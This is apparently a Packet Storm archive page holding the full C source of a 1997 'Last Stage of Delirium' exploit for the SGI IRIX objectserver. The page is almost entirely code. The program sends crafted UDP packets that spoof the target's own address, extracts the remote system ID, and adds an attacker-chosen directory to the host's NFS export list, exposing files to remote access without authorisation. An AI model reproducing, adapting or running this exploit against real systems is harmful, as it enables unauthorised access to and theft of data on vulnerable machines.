SGI objectserver "export" exploit - Remotely adds new entry to the export list on the IRIX system. See our SGI objectserver "account" exploit for more information. Only directories that aren't supersets of already exported ones can be added to the export list.
4b12bc670104362647c98bc09c33e31bd72cf0907624f171bded34b49558ac77/*## copyright LAST STAGE OF DELIRIUM jul 1997 poland *://lsd-pl.net/ #*/
/*## objectserver #*/
/* SGI objectserver "export" exploit */
/* Remotely adds new entry to the export list on the IRIX system. */
/* See our SGI objectserver "account" exploit for more information. */
/* Only directories that aren't supersets of already exported ones */
/* can be added to the export list. */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/uio.h>
#include <errno.h>
#include <stdio.h>
#define E if(errno) perror("");
struct iovec iov[2];
struct msghdr msg;
char buf1[1024],buf2[1024];
int sck;
unsigned long adr;
void show_msg(){
char *p,*p1;
int i,j,c,d;
c=0;
printf("%04x ",iov[0].iov_len);
p=(char*)iov[0].iov_base;
for(i=0;i<iov[0].iov_len;i++){
c++;
if(c==17){
printf(" ");
p1=p;p1=p1-16;
for(j=0;j<16;j++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
c=1;
printf("\n ");
}
printf("%02x ",(unsigned char)*p++);
}
printf(" ");
p1=p;p1=p1-c;
if(c>1){
for(i=0;i<(16-c);i++) printf(" ");
for(i=0;i<c;i++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
}
printf("\n");
if(msg.msg_iovlen!=2) return;
c=0;
p=(char*)iov[0].iov_base;
d=p[0x0a]*0x100+p[0x0b];
p=(char*)iov[1].iov_base;
printf("%04x ",d);
for(i=0;i<d;i++){
c++;
if(c==17){
printf(" ");
p1=p;p1=p1-16;
for(j=0;j<16;j++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
c=1;
printf("\n ");
}
printf("%02x ",(unsigned char)*p++);
}
printf(" ");
p1=p;p1=p1-c;
if(c>1){
for(i=0;i<(16-c);i++) printf(" ");
for(i=0;i<c;i++){
if(isprint(*p1)) printf("%c",*p1);
else printf(".");
p1++;
}
}
printf("\n");
fflush(stdout);
}
char numer_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};
char numer_two[0x24]={
0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
0x01,0x07,0x01,0x01
};
char dodaj_one[0x10]={
0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};
char dodaj_two[1024]={
0x1c,0x03,0x00,0x43,0x01,0x04,0x0a,0x01,
0x01,0x3b,0x01,0x78
};
char dodaj_three[27]={
0x01,0x02,0x0a,0x01,0x01,0x3b,0x01,
0xd2,0x00,0x00,0x80,0x43,0x01,0x04,0x17,
0x0b,0x01,0x01,0x3b,0x01,0x02,0x01,0x01,
0x01,0x09,0x43,0x01
};
char dodaj_four[47]={
0x17,0x0b,0x01,0x01,0x3b,0x01,0xd2,
0x01,0x04,0x01,0x09,0x43,0x01,0x04,0x72,
0x6f,0x6f,0x74,0x17,0x0b,0x01,0x01,0x3b,
0x01,0xd2,0x01,0x08,0x01,0x07,0x01,0x01,
0x17,0x0b,0x01,0x01,0x3b,0x01,0x01,0x01,
0x01,0x01,0x0f,0x02,0xff,0xff,0xff,0xff
};
char fake_adrs[0x10]={
0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
char *get_sysinfo(){
int i=0,j,len;
iov[0].iov_base=numer_one;
iov[0].iov_len=0x10;
iov[1].iov_base=numer_two;
iov[1].iov_len=0x24;
msg.msg_name=(caddr_t)fake_adrs;
msg.msg_namelen=0x10;
msg.msg_iov=iov;
msg.msg_iovlen=2;
msg.msg_accrights=(caddr_t)0;
msg.msg_accrightslen=0;
printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
printf("\n");
iov[0].iov_base=buf1;
iov[1].iov_base=buf2;
iov[1].iov_len=0x200;
msg.msg_iovlen=2;
printf("RM: --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg();
printf("\n");
while(i<len-0x16)
if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
printf("remote system ID: ");
for(j=0;j<buf2[i+6];j++) printf("%02x ",(unsigned char)buf2[i+7+j]);
printf("\n");
return(&buf2[i+6]);
}else i++;
return(0);
}
void new_export(int len){
iov[0].iov_base=dodaj_one;
iov[0].iov_len=0x10;
iov[1].iov_base=dodaj_two;
iov[1].iov_len=len;
msg.msg_name=(caddr_t)fake_adrs;
msg.msg_namelen=0x10;
msg.msg_iov=iov;
msg.msg_iovlen=2;
msg.msg_accrights=(caddr_t)0;
msg.msg_accrightslen=0;
printf("SM: --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
printf("\n");
iov[0].iov_base=buf1;
iov[1].iov_base=buf2;
iov[1].iov_len=0x200;
msg.msg_iovlen=2;
printf("RM: --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
printf("\n");
}
void info(char *text) {
printf("usage: %s address directory\n",text);
}
main(int argc,char **argv){
int probe=0;
unsigned int offset;
char *sys_info;
printf("copyright LAST STAGE OF DELIRIUM jul 1997 poland //lsd-pl.net/\n");
printf("objectserver for irix 5.2 5.3 6.2\n\n");
if(argc<2) {info(argv[0]);exit(0);}
else if(argc==2) probe=1;
offset=39;
adr=inet_addr(argv[1]);
sck=socket(AF_INET,SOCK_DGRAM,0);
memcpy(&fake_adrs[4],&adr,4);
memcpy(&dodaj_four[43],&adr,4);
if(!(sys_info=get_sysinfo())){
printf("error: can't get system ID for %s.\n",argv[1]);
exit(1);
}
if(!probe){
memcpy(&dodaj_two[0x0c],sys_info,sys_info[0]+1);
memcpy(&dodaj_two[0x0c+sys_info[0]+1],&dodaj_three[0],27);
offset+=sys_info[0]+1;
dodaj_two[offset++]=strlen(argv[2]);
memcpy(&dodaj_two[offset],argv[2],strlen(argv[2]));
offset+=strlen(argv[2]);
memcpy(&dodaj_two[offset],&dodaj_four[0],47);
offset+=47;
dodaj_one[10]=offset>>8;
dodaj_one[11]=offset&0xff;
new_export(offset);
}else printf("error: no directory specified.\n");
}
/* www.hack.co.za [12 August 2000]*/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed